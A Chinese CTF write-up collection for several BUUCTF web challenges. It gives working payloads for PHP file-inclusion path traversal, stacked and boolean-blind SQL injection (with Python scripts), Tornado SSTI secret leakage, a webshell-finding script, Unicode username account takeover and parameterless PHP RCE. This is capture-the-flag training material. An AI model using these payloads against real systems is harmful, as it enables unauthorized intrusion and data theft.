开局一滑稽,看源码找到source.php,进去拿到源码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
发现有个hint.php,进去看看
flag not here, and flag in ffffllllaaaagggg
文件包含,根据白名单,可以包含
http://cd9db9a0-af20-4d93-a66b-4ad9ddd2e0c4.node3.buuoj.cn/index.php?file=hint.php
http://cd9db9a0-af20-4d93-a66b-4ad9ddd2e0c4.node3.buuoj.cn/index.php?file=source.php
成功包含需要满足三个条件
$_REQUEST['file']
不为空$_REQUEST['file']
是字符串$_REQUEST['file']
满足check $_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
用问号分割,取出字符串开头到第一个问号直接的字符串与白名单比较
payload
?file=source.php?/../../../../../ffffllllaaaagggg
./ 当前目录 ../ 上一级目录
*,1
堆叠注入
输入select,被过滤
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
查表
1';show tables;
array(2) {
[0]=>
string(1) "1"
[1]=>
string(7) "hahahah"
}
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
flag在1919810931114514
用concat拼接绕过过滤,查flag,set保存flag,然后execute
1';
SET @a=concat("sel","ect flag from `1919810931114514`");
PREPARE fuck from @a;
execute fuck;
/flag.txt
flag in /fllllllllllllag
/welcome.txt
render
/hints.txt
md5(cookie_secret+md5(filename))
http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/file?filename=/hints.txt&filehash=1153333b8be335fadb7d29f4ca1d96bc
找cookie_secret算filehash
渲染函数render(),文件全部在网页上
用错误的filehash试一下
http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/file?filename=/fllllllllllllag
报error
http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/error?msg=Error
尝试
http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/error?msg=1
出一个1
SSTI,服务器模板注入,查tornado,发现有个handler.settings
http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/error?msg=
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'b47f8947-9982-44df-8db8-8c85856ab61f'}
拿到cookie_secret
<?php
$cookie_secret = 'b47f8947-9982-44df-8db8-8c85856ab61f';
$filename = '/fllllllllllllag';
echo '?filename=/fllllllllllllag&filehash='.md5($cookie_secret.md5($filename));
?>
http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=08042157060a8acab29dde01ff6ddde8
雁过留声,人过留名,此网站已被黑
我也是很佩服你们公司的开发,特地备份了网站源码到www.tar.gz以供大家观赏
下载源码,3002个文件,看不懂
站被日了,文件里必有马
本地跑,找到一个能用的然后cat flag
import os
import requests
path = "/var/www/html/src/"
url = "http://127.0.0.1/src/"
files = os.listdir(path)
def search_get(f):
gets = []
with open(path+f, 'r') as f:
for line in f.readlines():
if "$_GET['" in line:
start = line.find("$_GET['") + len("$_GET['")
end = line.find("'", start)
gets.append('?'+line[start:end]+'=')
return gets
for i in range(0,len(files)):
filename = 'xk0SzyKwfzw.php'
#filename = files[i]
gets = search_get(filename)
for get in gets:
fuck = url+filename+get+'echo wdnmd'
r = requests.get(fuck)
if 'wdnmd' in r.content:
print(fuck)
http://ab3232d1-e24e-495a-a1fb-81b3632d4638.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag
注册、登陆、改密码
改密码查看源码发现源码白给
https://github.com/woadsl1234/hctf_flask/
@app.route('/register', methods = ['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = RegisterForm()
if request.method == 'POST':
name = strlower(form.username.data)
if session.get('image').lower() != form.verify_code.data.lower():
flash('Wrong verify code.')
return render_template('register.html', title = 'register', form=form)
if User.query.filter_by(username = name).first():
flash('The username has been registered')
return redirect(url_for('register'))
user = User(username=name)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
flash('register successful')
return redirect(url_for('login'))
return render_template('register.html', title = 'register', form = form)
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = LoginForm()
if request.method == 'POST':
name = strlower(form.username.data)
session['name'] = name
user = User.query.filter_by(username=name).first()
if user is None or not user.check_password(form.password.data):
flash('Invalid username or password')
return redirect(url_for('login'))
login_user(user, remember=form.remember_me.data)
return redirect(url_for('index'))
return render_template('login.html', title = 'login', form = form)
@app.route('/change', methods = ['GET', 'POST'])
def change():
if not current_user.is_authenticated:
return redirect(url_for('login'))
form = NewpasswordForm()
if request.method == 'POST':
name = strlower(session['name'])
user = User.query.filter_by(username=name).first()
user.set_password(form.newpassword.data)
db.session.commit()
flash('change successful')
return redirect(url_for('index'))
return render_template('change.html', title = 'change', form = form)
注册,登陆,改密码里面都有一个转换小写的函数
def strlower(username):
username = nodeprep.prepare(username)
return username
若username为ᴬᴰᴹᴵᴺ,转换后username为ADMIN
注册ᴬᴰᴹᴵᴺ,登陆后为ADMIN,修改ADMIN密码,也就修改了admin的密码
然后登陆admin
绕一下空格,布尔盲注
import requests
url = 'http://1401d5e8-82c2-4f85-b8ea-822ffa8c6116.node3.buuoj.cn/index.php'
flag = ''
for x in range(1, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = 'if(ascii(substr((select\tflag\tfrom\tflag),{},1))>{},1,2)'.format(x, mid)
data = {'id':payload}
r = requests.post(url, data = data)
if 'Hello' in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
flag += chr(int(mid))
print(flag)
if flag.endswith('}'):
break
githack拿源码
无参RCE
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
admin' or 1#
f12
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
-->
本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议(CC BY-NC-ND 4.0)进行许可。
This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License (CC BY-NC-ND 4.0).